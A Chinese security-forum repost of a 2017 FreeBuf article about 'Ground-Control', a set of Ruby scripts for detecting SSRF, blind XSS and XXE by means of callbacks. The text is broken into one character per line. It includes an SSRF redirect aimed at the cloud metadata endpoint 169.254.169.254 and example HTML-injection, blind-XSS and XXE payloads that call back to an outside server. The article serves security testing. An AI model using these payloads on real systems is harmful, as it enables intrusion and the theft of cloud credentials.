论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[11469] 2017-06-17_一款用于发现SSRF、XXE、XSS漏洞的小工具
文档创建者:
s7ckTeam
浏览次数:
15
最后更新:
2025-01-18
漏洞
15 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2017-06-17_一款用于发现SSRF、XXE、XSS漏洞的小工具
一
款
用
于
发
现
S
S
R
F
、
X
X
E
、
X
S
S
漏
洞
的
小
工
具
A
l
p
h
a
_
h
4
c
k
F
r
e
e
B
u
f
2
0
1
7
-
0
6
-
1
7
今
天
给
大
家
介
绍
的
是
运
行
在
我
自
己
W
e
b
服
务
器
中
的
一
堆
脚
本
,
这
些
脚
本
可
以
帮
助
我
快
速
检
测
S
S
R
F
、
B
l
i
n
d
X
X
S
以
及
X
X
E
漏
洞
,
喜
欢
的
朋
友
可
以
将
它
们
部
署
到
自
己
的
环
境
中
。
当
然
了
,
你
们
也
可
以
根
据
自
己
的
需
要
来
自
定
义
修
改
脚
本
代
码
。
G
r
o
u
n
d
-
C
o
n
t
r
o
l
我
这
个
G
i
t
H
u
b
库
中
托
管
的
是
我
在
服
务
器
端
所
部
属
的
一
些
安
全
增
强
脚
本
,
它
们
可
以
检
测
S
S
R
F
(
服
务
器
端
请
求
伪
造
)
,
B
l
i
n
d
X
S
S
、
以
及
X
X
E
漏
洞
。
目
前
本
项
目
仍
处
于
更
新
过
程
中
,
因
为
我
现
在
还
在
收
集
相
关
的
脚
本
。
在
使
用
这
些
脚
本
之
前
,
我
通
常
会
重
写
脚
本
中
的
部
分
代
码
或
通
过
n
e
t
c
a
t
设
置
监
听
器
。
但
这
样
做
的
灵
活
性
就
非
常
差
了
,
因
此
我
才
决
定
将
这
些
脚
本
都
上
传
到
一
个
代
码
库
上
,
这
样
每
当
服
务
器
需
要
使
用
某
个
脚
本
时
,
我
们
就
可
以
直
接
从
G
i
t
H
u
b
代
码
库
中
克
隆
下
来
即
可
。
必
备
条
件
必
备
条
件
脚
本
的
运
行
需
要
R
u
b
y
2
.
3
、
域
名
的
有
效
S
S
L
证
书
、
以
及
一
台
能
够
开
启
端
口
8
0
、
4
4
3
、
8
0
8
0
和
8
4
4
3
的
W
e
b
服
务
器
。
端
口
8
0
和
4
4
3
用
来
处
理
简
单
的
W
e
b
流
量
;
端
口
8
0
8
0
也
是
一
个
H
T
T
P
端
口
,
当
端
口
8
0
无
法
正
常
访
问
时
可
以
用
端
口
8
0
8
0
来
处
理
网
络
通
信
数
据
;
端
口
8
4
4
3
是
一
个
用
来
处
理
H
T
T
P
S
流
量
的
替
代
段
藕
,
不
同
的
是
它
需
要
使
用
自
签
名
的
S
S
L
证
书
,
我
可
以
使
用
这
个
端
口
来
判
断
服
务
器
的
S
S
L
证
书
是
否
有
效
。
工
具
配
置
工
具
配
置
将
该
项
目
克
隆
到
本
地
,
然
后
通
过
运
行
“
i
n
s
t
a
l
l
.
s
h
“
来
安
装
本
工
具
的
必
备
组
件
。
依
赖
组
件
安
装
完
成
之
后
,
运
行
“
s
t
a
r
t
.
s
h
”
来
监
听
所
有
的
端
口
。
因
为
脚
本
需
要
监
听
端
口
8
0
和
4
3
3
,
因
此
我
们
还
需
要
r
o
o
t
权
限
才
行
,
但
是
在
将
来
的
版
本
中
我
们
会
尝
试
通
过
切
换
用
户
环
境
来
解
决
这
个
问
题
。
功
能
介
绍
功
能
介
绍
R
e
d
i
r
e
c
t
s
/
r
e
d
i
r
e
c
t
节
点
用
来
将
一
个
请
求
重
定
向
到
另
一
台
服
务
器
或
网
络
节
点
,
当
你
需
要
一
台
外
部
服
务
器
请
求
重
定
向
到
内
部
系
统
时
,
你
可
以
使
用
这
项
功
能
。
使
用
样
例
如
下
:
c
u
r
l
-
v
v
"
h
t
t
p
:
/
/
s
e
r
v
e
r
/
r
e
d
i
r
e
c
t
?
u
r
l
=
h
t
t
p
:
/
/
1
6
9
.
2
5
4
.
1
6
9
.
2
5
4
/
l
a
t
e
s
t
/
m
e
t
a
-
d
a
t
a
/
"
P
i
n
g
P
o
n
g
有
时
你
可
能
需
要
一
个
能
够
响
应
指
定
b
o
d
y
和
h
e
a
d
e
r
的
页
面
,
而
/
p
i
n
g
_
p
o
n
g
节
点
就
是
你
所
需
要
的
。
使
用
样
例
如
下
:
c
u
r
l
-
v
v
"
h
t
t
p
:
/
/
s
e
r
v
e
r
/
p
i
n
g
_
p
o
n
g
?
b
o
d
y
=
%
3
c
h
1
%
3
e
H
e
l
l
o
%
3
c
/
h
1
%
3
e
"
B
l
i
n
d
C
a
l
l
b
a
c
k
如
果
你
想
要
知
道
一
个
无
法
直
接
访
问
的
系
统
是
否
执
行
了
你
的
H
T
M
L
代
码
或
X
S
S
P
a
y
l
o
a
d
,
你
可
以
在
c
o
n
f
i
g
.
j
s
o
n
文
件
中
添
加
一
个
c
a
l
l
b
a
c
k
_
t
o
k
e
n
s
参
数
,
数
据
结
构
如
下
所
示
:
{
"
c
a
l
l
b
a
c
k
_
t
o
k
e
n
s
"
:
{
"
e
e
3
4
a
1
7
9
1
a
b
3
4
5
f
7
8
9
"
:
{
"
h
o
s
t
"
:
"
h
a
c
k
e
r
o
n
e
.
c
o
m
"
,
"
p
o
r
t
"
:
4
4
3
,
"
s
s
l
"
:
t
r
u
e
,
"
p
a
t
h
"
:
"
/
w
e
b
h
o
o
k
s
"
,
"
p
a
r
a
m
e
t
e
r
"
:
"
u
r
l
"
,
"
m
e
t
h
o
d
"
:
"
P
O
S
T
"
}
}
}
这
个
c
a
l
l
b
a
c
k
中
包
含
了
攻
击
目
标
(
插
入
P
a
y
l
o
a
d
的
地
方
)
的
相
关
信
息
,
如
果
你
收
到
了
一
个
c
a
l
l
b
a
c
k
,
那
么
它
将
可
以
帮
助
你
验
证
漏
洞
出
现
的
根
本
原
因
。
需
要
注
意
的
是
,
其
中
的
每
一
个
参
数
(
p
a
r
a
m
e
t
e
r
、
h
o
s
t
、
p
o
r
t
、
p
a
t
h
和
m
e
t
h
o
d
)
都
需
要
拥
有
自
己
的
c
a
l
l
b
a
c
k
_
t
o
k
e
n
。
你
可
以
根
据
你
所
要
测
试
的
漏
洞
类
型
来
构
建
自
己
的
P
a
y
l
o
a
d
,
下
面
给
出
的
是
针
对
H
T
M
L
注
入
漏
洞
和
X
S
S
漏
洞
的
测
试
用
例
。
接
下
来
,
将
你
的
P
a
y
l
o
a
d
通
过
注
入
点
提
交
给
服
务
器
。
当
带
有
c
a
l
l
b
a
c
k
_
t
o
k
e
n
的
请
求
被
触
发
之
后
,
你
将
能
够
在
l
o
g
s
/
a
c
c
e
s
s
_
l
o
g
中
查
看
到
日
志
记
录
。
绝
大
多
数
情
况
下
,
我
会
使
用
命
令
“
t
a
i
l
-
f
l
o
g
s
/
a
c
c
e
s
s
_
l
o
g
”
来
查
看
漏
洞
和
请
求
的
触
发
情
况
。
H
T
M
L
注
入
:
注
入
:
<
i
m
g
s
r
c
=
"
h
t
t
p
s
:
/
/
s
e
r
v
e
r
/
p
i
x
e
l
?
c
a
l
l
b
a
c
k
_
t
o
k
e
n
=
e
e
3
4
a
1
7
9
1
a
b
3
4
5
f
7
8
9
"
s
t
y
l
e
=
"
d
i
s
p
l
a
y
:
n
o
n
e
;
"
/
>
B
l
i
n
d
X
S
S
:
:
<
s
c
r
i
p
t
s
r
c
=
"
h
t
t
p
s
:
/
/
s
e
r
v
e
r
/
c
o
l
l
e
c
t
?
c
a
l
l
b
a
c
k
_
t
o
k
e
n
=
e
e
3
4
a
1
7
9
1
a
b
3
4
5
f
7
8
9
"
>
<
/
s
c
r
i
p
t
>
X
X
E
:
:
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
?
>
<
!
D
O
C
T
Y
P
E
r
[
<
!
E
L
E
M
E
N
T
r
A
N
Y
>
<
!
E
N
T
I
T
Y
s
p
S
Y
S
T
E
M
"
h
t
t
p
:
/
/
s
e
r
v
e
r
/
p
i
x
e
l
?
c
a
l
l
b
a
c
k
_
t
o
k
e
n
=
e
e
3
4
a
1
7
9
1
a
b
3
4
5
f
7
8
9
"
>
]
>
<
r
>
&
s
p
;
<
/
r
>
开
启
另
一
台
服
务
器
开
启
另
一
台
服
务
器
服
务
器
默
认
会
监
听
端
口
8
0
、
4
4
3
、
8
0
8
0
、
8
4
4
3
,
但
如
果
你
想
开
启
另
外
一
台
服
务
器
来
监
听
其
他
端
口
的
话
,
你
可
以
运
行
命
令
“
r
u
b
y
a
p
p
/
s
e
r
v
e
r
.
r
b
-
p
:
p
o
r
t
”
。
如
果
你
想
使
用
S
S
L
,
你
可
以
在
刚
才
的
命
令
后
面
添
加
“
-
c
e
r
t
:
c
e
r
t
.
p
e
m
”
。
当
一
个
潜
在
的
S
S
R
F
漏
洞
只
允
许
我
们
连
接
特
定
端
口
的
话
,
这
个
功
能
就
非
常
有
用
了
。
*
参
考
来
源
:
参
考
来
源
:
j
o
b
e
r
t
a
b
m
a
,
,
F
B
小
编
小
编
A
l
p
h
a
_
h
4
c
k
编
译
,
转
载
请
注
明
来
自
编
译
,
转
载
请
注
明
来
自
F
r
e
e
B
u
f
.
C
O
M
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞